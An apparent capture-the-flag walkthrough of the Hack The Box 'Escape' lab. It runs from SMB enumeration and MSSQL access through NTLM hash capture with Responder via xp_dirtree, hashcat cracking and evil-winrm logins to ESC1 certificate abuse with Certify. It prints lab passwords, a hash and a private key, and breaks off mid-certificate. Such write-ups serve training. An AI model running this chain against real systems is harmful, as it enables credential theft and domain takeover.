Run a quick nmap scan
└─$ nmap -sC -sV -Pn -v 10.129.228.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 03:03 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 03:03
Completed Parallel DNS resolution of 1 host. at 03:03, 0.00s elapsed
Initiating SYN Stealth Scan at 03:03
Scanning 10.129.228.253 [1000 ports]
Discovered open port 445/tcp on 10.129.228.253
Discovered open port 53/tcp on 10.129.228.253
Discovered open port 135/tcp on 10.129.228.253
Discovered open port 139/tcp on 10.129.228.253
Discovered open port 593/tcp on 10.129.228.253
Discovered open port 389/tcp on 10.129.228.253
Discovered open port 1433/tcp on 10.129.228.253
Discovered open port 88/tcp on 10.129.228.253
Discovered open port 636/tcp on 10.129.228.253
Discovered open port 464/tcp on 10.129.228.253
Discovered open port 3269/tcp on 10.129.228.253
Discovered open port 3268/tcp on 10.129.228.253
Completed SYN Stealth Scan at 03:03, 7.25s elapsed (1000 total ports)
Initiating Service scan at 03:03
Scanning 12 services on 10.129.228.253
Completed Service scan at 03:04, 47.08s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.228.253.
Initiating NSE at 03:04
Completed NSE at 03:05, 40.18s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 2.73s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Nmap scan report for 10.129.228.253
Host is up (0.13s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-12 15:03:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:16+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.228.253:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.228.253:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-12T15:02:09
| Not valid after: 2054-10-12T15:02:09
| MD5: 6b21:24f9:e4e3:c876:c251:2483:16c9:b9b5
|_SHA-1: 81ab:c3b1:46d0:f00c:0bc0:7edb:6970:6422:9c57:c1a9
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
|_ssl-date: 2024-10-12T15:05:16+00:00; +8h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s
| smb2-time:
| date: 2024-10-12T15:04:36
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.68 seconds
Raw packets sent: 1989 (87.516KB) | Rcvd: 13 (572B)
What is the domain name for Escape as enumerated from the LDAP service? sequel.htb
What is the name of the non-standard SMB share on Escape? Public
To enumerate SMB shares we will try list out the shares using smbclient and anonymous login
└─$ smbclient -L \\\\10.129.228.253\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.253 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
What is the password for the PublicUser on MSSQL?
We will enumerate SMB share a bit more to find out. We will download SQL Server Procedures.pdf.
└─$ smbclient \\\\10.129.228.253\\public
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1440678 blocks available
smb: \> mget *
Get file SQL Server Procedures.pdf? yes
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (65.0 KiloBytes/sec) (average 65.0 KiloBytes/sec)
smb: \> exit
Upon reading the pdf, we get the public user credentials
cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<userame>" /pass:<password>
user PublicUser and password GuestUserCantWrite1
What user is the MSSQL instance running as? sql_svc
Get the MSSQL server to read a file from an SMB host you control, and watch for the authentication.
With the creds, I can connect to the MSSQL server. I’ll use the Impacket tool mssqlclient.py
:
└─$ impacket-mssqlclient sequel.htb/PublicUser@10.129.228.253
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
There are four databases on this server:
SQL (PublicUser guest@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdb
I tried running commands through MSSQL server using the xp_cmdshell
stored procedure. Unfortunately I get permission denied:
SQL (PublicUser guest@master)> xp_cmdshell whoami;
ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
The next thing to try is to get the SQL server to connect back to our host and authenticate, and capture a challenge or response.
We will start Responder here as root listening on a bunch of services for the tun0
interface:
└─$ sudo python3 /usr/share/responder/Responder.py -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [OFF]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [OFF]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [OFF]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.8]
Responder IPv6 [dead:beef:2::1006]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-9A6WSBC7SGR]
Responder Domain Name [Q02Q.LOCAL]
Responder DCE-RPC Port [49413]
[+] Listening for events...
Remember to turn off unnecessary services such as HTTPS, LDAPS and winRM in Responder config
└─$ sudo nano /usr/share/responder/Responder.conf
Now we will tell MSSQL to read a file on a share on my host:
SQL (PublicUser guest@master)> EXEC xp_dirtree '\\10.10.14.8\share', 1, 1
subdirectory depth file
------------ ----- ----
The responder captures hash
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:a18f0f31fd5a9e73:949209A630AB7E59E106E366CC2F429B:010100000000000000F4F502561CDB0172ECD403C591980B0000000002000800510030003200510001001E00570049004E002D003900410036005700530042004300370053004700520004003400570049004E002D00390041003600570053004200430037005300470052002E0051003000320051002E004C004F00430041004C000300140051003000320051002E004C004F00430041004C000500140051003000320051002E004C004F00430041004C000700080000F4F502561CDB0106000400020000000800300030000000000000000000000000300000EFB4F169095B479DBEFC1891A254C898D4E56D62F13DEB44F2A502661CC742F10A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0038000000000000000000
We will use hashcat
to crack this NTLMv2 Hhsh.
We can identify which hashcat module number to use by running
└─$ hashcat --help | grep -i ntlmv2
5600 | NetNTLMv2 | Network Protocol
27100 | NetNTLMv2 (NT) | Network Protocol
We will copy and save the hash as sql_svc.hash
and will run hashcat to crack it
└─$ hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt
SQL_SVC::sequel:a18f0f31fd5a9e73:949209a630ab7e59e106e366cc2f429b:010100000000000000f4f502561cdb0172ecd403c591980b0000000002000800510030003200510001001e00570049004e002d003900410036005700530042004300370053004700520004003400570049004e002d00390041003600570053004200430037005300470052002e0051003000320051002e004c004f00430041004c000300140051003000320051002e004c004f00430041004c000500140051003000320051002e004c004f00430041004c000700080000f4f502561cdb0106000400020000000800300030000000000000000000000000300000efb4f169095b479dbefc1891a254c898d4e56d62f13deb44f2a502661cc742f10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0038000000000000000000:REGGIE1234ronnie
What is the sql_svc user's password? REGGIE1234ronnie
What is the Ryan.Cooper user's password? Enumerate the SQLServer logs. It seems Ryan entered a password as a username at least once.
Running nxc winrm
we can see that winrm is enabled on the DC
└─$ nxc winrm 10.129.228.253
WINRM 10.129.228.253 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
Use evil-winrm
with sql_svc’s credential
└─$ evil-winrm -i 10.129.228.253 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>
Navigating through the directory, we can see a log file in C:\SQLServer\Logs\ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> ls
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> cat ERRORLOG.BAK
Upon reading through the logs, we see Ryan.Cooper has entered his password.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.
Open up another evil-winrm session using Ryan Cooper’s credential.
Find the user.txt located on Ryan’s Desktop.
└─$ evil-winrm -i 10.129.228.253 -u 'ryan.cooper' -p NuclearMosquito3
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ls
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> ls
Directory: C:\Users\Ryan.Cooper\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/12/2024 8:02 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> cat user.txt
ee206be1fed80997ddc918f87dfa1bc3
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : dc
Primary Dns Suffix . . . . . . . : sequel.htb
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : sequel.htb
.htb
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-7A-DD
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::4962:1632:659d:e390(Preferred)
Link-local IPv6 Address . . . . . : fe80::4962:1632:659d:e390%4(Preferred)
IPv4 Address. . . . . . . . . . . : 10.129.228.253(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Saturday, October 12, 2024 8:01:29 AM
Lease Expires . . . . . . . . . . : Saturday, October 12, 2024 9:31:29 AM
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%4
10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DHCPv6 IAID . . . . . . . . . . . : 251678806
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-88-DA-51-00-0C-29-37-43-59
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
What is the name of the vulnerable ADCS template on Escape? Try a tool like Certify or Certipy to enumerate ADCS. We will look for Active Directory Certificate Services (ADCS). A quick way to check for this is using nxc or crackmampexec
└─$ nxc ldap 10.129.228.253 -u 'ryan.cooper' -p NuclearMosquito3 -M adcs
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB 10.129.228.253 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.228.253 636 DC [+] sequel.htb\ryan.cooper:NuclearMosquito3
ADCS 10.129.228.253 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.228.253 389 DC Found PKI Enrollment Server: dc.sequel.htb
ADCS 10.129.228.253 389 DC Found CN: sequel-DC-CA
We will need to see if there are any templates in this ADCS that are insecurely configured. To enumerate further, we will upload a copy of Certify by downloading a copy from SharpCollection, and uploading it to Escape:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> upload Certify.exe
Info: Uploading /home/kali/Tools/Certify.exe to C:\Users\Ryan.Cooper\documents\Certify.exe
Data: 238248 bytes of 238248 bytes copied
Info: Upload successful!
We will run Certify.exe find /vulnerable /currentuser
to look across the groups for the current user. The Certify then lists a single vulnerable certificate template:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Certify.exe find /vulnerable /currentuser
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.2391560
The danger here is that sequel\Domain Users
has Enrollment Rights for the certificate.
What is the name of the vulnerable ADCS template on Escape? UserAuthentication
What is the administrator user's NTLM hash? Exploit the ESC1 vulnerability in the UserAuthentication template to leak this.
We will run Certify.exe
to request a certificate with an alternative name of administrator. It returns a cert.pem
:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 13
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAvuDH2SU6wGWrAKH+gxXuHFbPqoD0xktI7RQP7C48q9edSUi1
gW9q6rwDk2qgvTF/C36Eh4HsLOsH+bMs9kdJIMKym8EypZ+t9kj87TXcQimoizUK
uSI4Y0rHVCJRDVGMLqm7cpgRjqNqFOufQ0LPtLUR2yHm/AZ1RDpXK15AAcpjLnHW
KgH1MS5GmG8VYmqP3IbNooSR9Y21KDV5pUeK9RrbAL2lTBLD+iEZgP/+JSNweC7v
IX+NTH711lZeFYlzmK0jAswQD5+c6Z5+4T/eZQoWFVCL1WM0moLxouIZKKtpFzHs
qV/66Qz3OsRBko2nzUBFKnzMoWmPgQUuAIJqSQIDAQABAoIBAQCfrFuhm5ItNh85
dUn6EFNSo5AumpeodXv4zuqO8RLR0ZmCn28uaqzu1f7Lx8vU2F3lmJ122clevfG7
ARbgojtbS2OsBY6/m/cjamUibgbl1gFnCiUBP84ZyYk7KUXSNWBl/JiQwQMW5j6s
Z3qgAnjMOxhHznFybFiWjZMz9TDoDRok4S6fRs3/KF2UJBd8fryoXwoAvP15fRPr
X1LmVu2fWZPv3xV4piSvtkr2Fn810CLByGJaDNYJctkCOP7eZio3POY1SaVATYm0
34C4WCg8a3u6wgDgGB60Xa685y+3bdf2G62WKm6B3AXQamPswnHQ2GRnz3VlsOGY
bUSZduMNAoGBAOssuf3PsTO6Z8mLp0toNnCsWmZKJG78IyLTMTcRB0qwG5NqLaS0
ORkW0mbVMuEd8rjksPYDhbUivuPnHspv5Th06WynkN3lBheEz1hGtqBZVIYSh+3c
kXwXsfBMKDafCJTMGIdWPv1lwdKTuX2/20X6hczrJFwxnLHXJ1EqtfHPAoGBAM/H
3+cuZDZp4YbK/zy6uD8moVjDX8kQaB0O7z7n3Xr89D59XYqTXCSnAmJ2+OJzlpEx
UEty8B4EwPgaHwFJaaJkND4GeEawfcikn2IJ5+8V0fZR8YnLVTsaSUY2VWlXNh14
cBG1GK9EpOE/9dRj1bIGwXymYCSdvPu6v2+B9+BnAoGAa+sYZop6bJxrqCc32/i0
krvkt+/qDCwUC5USjox35iQuY1VkIKK7WPIKFzpaoMdXbNU1B4/SOa76HicfEBKN
A31S6JN0fP7t7rj5VS8N+0NC8EtsqRCAiottEjJAeeA81dtanjBLs4iQiwtTIYt7
Gf++iqyVAOGbYFi1KCALYi0CgYEApAGuuHoj29eDjrQY98SiviYt4TSGHNz4cUdi
jRLT/cpAuDqYZVOfvcad2T7zgTufs4drS8Kzyd4Su0NTCd76pJXXrsXIlnOlNYTL
0cTj8BIXIwjXUN7QrdA32lX04StXqbdxLmj1zRKv2qRz1GvhN56hh1SEOyLPExv7
E3dRQy0CgYEAvDqiBKupCzNnga/UbJlCp5/dffn0DUu4dwXjjZYnHhQV0d/EIsik
M9ZmgBQbPUaqQnEFkI9idm+vqZIpLY/OrXoFoqnPosX2d7uSt5Pd0LwUcqbxBKS4
UOXfFh4k2J/u45o40tEOJRotL6DSdjLtJb7ieH5pvnIbRK3/8ErFxzg=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAA1eTE2g25X18AAAAAAADTANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjQxMDEyMTYxMzE4WhcNMzQxMDEw
MTYxMzE4WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC+4MfZJTrAZasAof6DFe4cVs+q
gPTGS0jtFA/sLjyr151JSLWBb2rqvAOTaqC9MX8LfoSHgews6wf5syz2R0kgwrKb
wTKln632SPztNdxCKaiLNQq5IjhjSsdUIlENUYwuqbtymBGOo2oU659DQs+0tRHb
Ieb8BnVEOlcrXkABymMucdYqAfUxLkaYbxViao/chs2ihJH1jbUoNXmlR4r1GtsA
vaVMEsP6IRmA//4lI3B4Lu8hf41MfvXWVl4ViXOYrSMCzBAPn5zpnn7hP95lChYV
UIvVYzSagvGi4hkoq2kXMeypX/rpDPc6xEGSjafNQEUqfMyhaY+BBS4AgmpJAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZQIBBDApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFFqswYrt9aCxpxEcaawU+xV3pkk/
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
